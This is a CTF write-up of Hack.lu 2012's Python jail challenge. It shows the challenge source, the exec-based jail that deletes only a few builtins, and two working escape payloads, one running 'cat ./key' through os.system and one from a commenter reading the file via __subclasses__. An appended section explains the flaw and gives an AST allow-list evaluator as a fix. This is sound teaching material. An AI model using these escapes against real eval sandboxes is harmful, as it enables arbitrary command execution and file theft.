
Oct
25

Hack.lu 2012 CTF Challenge #7 (200)

7 – python jail

You are surrounded by zombies. You heard there’s a safe house nearby, but climbing fences is hard with a beer belly. Thank god, there’s another survivor over there. “Hey! Help me!”, you shout. He just laughs and shakes you off the fence. Asshole.

Later, you see his dead body lying in front of a high security door secured by automated weapons. Heh… karma is a bitch. But that means you’ll have to find another way in. In this nerd area, all the doors are secured with stupid computer puzzles. So, what the heck. Better try this one:

chall.py

ctf.fluxfingers.net tcp/2045

Hint:
You’ll find the entrance in “./key”

Notes:
This challenge is a tribute to PHDays Finals 2012 challenge ‘ndevice’.
Thanks again, I had fun solving it.

I’m fairly certain that this challenge avoids being exploitable by
the tricks we could use in PHDays (the module “os” was imported…).
So, no advantage for people who did not attend PHDays.

Summary: python eval tricks

# chall.py as served by the challenge (Python 2: raw_input, exec statement).
def make_secure():
    # Delete the builtins the author considered dangerous. Everything else
    # (function globals, sys.modules, object introspection) is left in place.
    UNSAFE_BUILTINS = ['open',
                       'file',
                       'execfile',
                       'compile',
                       'reload',
                       '__import__',
                       'eval',
                       'input']  ## block object?
    for func in UNSAFE_BUILTINS:
        del __builtins__.__dict__[func]

from re import findall
make_secure()

while True:
    try:
        # Only the first whitespace-free token of the line is executed.
        inp = findall(r'\S+', raw_input())[0]
        a = None
        exec 'a=' + inp
        print 'Return Value:', a
    except Exception, e:
        print 'Exception:', e

There are many solutions for this level. For example, findall was imported from the re module, so its func_globals attribute is the global namespace of re, which contains sys. sys.modules holds every module the interpreter has already imported, including os, which the jail never touched, so os.system is reachable. Because findall('\S+') keeps only the first whitespace-free token of the line, the space in "cat ./key" has to be written as \x20 inside the string literal:

$ nc ctf.fluxfingers.net 2045
Go Ahead, Expoit me >;D
findall.func_globals['sys'].modules['os'].system("cat\x20./key")
findall.func_globals['sys'].modules['os'].system("cat\x20./key")
FvibLF0eBkCBk
Return Value: 0

The flag: FvibLF0eBkCBk
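Deleting a handful of builtins does not stop either escape shown on this page, because the interpreter's object graph (function globals, sys.modules, __class__ and __subclasses__) stays reachable. The hardened alternative is to never hand raw input to exec or eval: parse it into an AST, allow only the node types and names the application actually needs, and reject everything else before any code object is built. The following Python 3 example is added here and is not part of the original post or the challenge; the allowed node set, the allowed names and the safe_eval/classify helpers are this example's own choices. It rejects every Attribute and Subscript node outright, which covers func_globals (spelled __globals__ in Python 3) as well as the __subclasses__ chain from the comment below.

```python
import ast

# Node types a plain arithmetic/literal expression may contain (assumption:
# the application only needs numbers, containers, comparisons and a few calls).
_ALLOWED_NODES = (
    ast.Expression, ast.Constant, ast.BinOp, ast.UnaryOp, ast.BoolOp,
    ast.Compare, ast.List, ast.Tuple, ast.Dict, ast.Set,
    ast.Add, ast.Sub, ast.Mult, ast.Div, ast.FloorDiv, ast.Mod, ast.Pow,
    ast.USub, ast.UAdd, ast.Not, ast.And, ast.Or,
    ast.Eq, ast.NotEq, ast.Lt, ast.LtE, ast.Gt, ast.GtE,
    ast.Name, ast.Load, ast.Call,
)

# The only identifiers an expression may reference. No ast.Attribute and no
# ast.Subscript in the allow-list means "x.y", "x[y]" and every dunder walk
# such as ().__class__.__base__.__subclasses__() are rejected at parse time.
_ALLOWED_BUILTINS = {"abs": abs, "min": min, "max": max, "len": len}


class RejectedExpression(ValueError):
    """Raised when user input contains anything outside the allow-list."""


def check_expression(source: str) -> ast.Expression:
    """Parse `source` as a single expression and validate every AST node."""
    tree = ast.parse(source, mode="eval")
    for node in ast.walk(tree):
        if not isinstance(node, _ALLOWED_NODES):
            raise RejectedExpression(f"disallowed syntax: {type(node).__name__}")
        if isinstance(node, ast.Name) and node.id not in _ALLOWED_BUILTINS:
            raise RejectedExpression(f"disallowed name: {node.id}")
        if isinstance(node, ast.Call) and not isinstance(node.func, ast.Name):
            raise RejectedExpression("only direct calls to allowed names")
    return tree


def safe_eval(source: str):
    """Evaluate a validated expression with an empty builtins namespace.

    The empty __builtins__ is defence in depth: even if a node slipped past
    the allow-list, open/__import__/eval are simply not there to call.
    """
    tree = check_expression(source)
    code = compile(tree, "<user input>", "eval")
    return eval(code, {"__builtins__": {}}, dict(_ALLOWED_BUILTINS))


def classify(source: str) -> str:
    """Return 'ok:<repr>' for accepted input, 'rejected:<reason>' otherwise."""
    try:
        return "ok:" + repr(safe_eval(source))
    except RejectedExpression as exc:
        return "rejected:" + str(exc)
    except SyntaxError:
        return "rejected:syntax"


if __name__ == "__main__":
    # Constructed sample inputs: two benign expressions and the two payloads
    # from this page, which the allow-list refuses before anything runs.
    for sample in (
        "1 + 2 * 3",
        "max(3, 9)",
        r"""findall.func_globals['sys'].modules['os'].system("cat\x20./key")""",
        "().__class__.__base__.__subclasses__()[40]('./key','r').read()",
    ):
        print(sample, "->", classify(sample))
```

The important design choice is that the check is structural, not a denylist of names: new gadgets (another module in sys.modules, another index into __subclasses__) never matter because attribute access and subscripting are not expressible in the accepted grammar at all.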

1 comment

  1. 0vercl0k says:

    Oh nice thanks for the trick; here is mine: ().__class__.__base__.__subclasses__()[40]('./key','r').read()
